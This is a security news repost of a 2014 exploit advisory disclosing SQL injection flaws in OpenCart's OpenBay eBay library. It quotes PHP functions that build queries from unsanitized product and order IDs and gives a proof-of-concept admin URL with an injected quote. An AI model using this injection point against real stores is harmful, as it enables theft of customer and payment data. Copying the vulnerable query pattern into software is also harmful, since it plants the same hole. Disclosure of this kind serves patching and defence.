An independent Pakistani cyber security expert Sadat Ullah from Karachi who is previously well known for finding programming flaws in WHMCS , MyBB , Clicksharepro, iscripts, Playsms and many other have recently found a new flaw in OpenCart CMS which is widely used by online shopping stores and the customers data within these online websites have millions of credit card and other financial details.
however Sadat Ullah have submitted 0day to exploit-db and packetstorm.
Details:-
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
#Independent Pakistani Security Researcher
View full post on Who Got Hacked – Latest Hacking News and Security Updates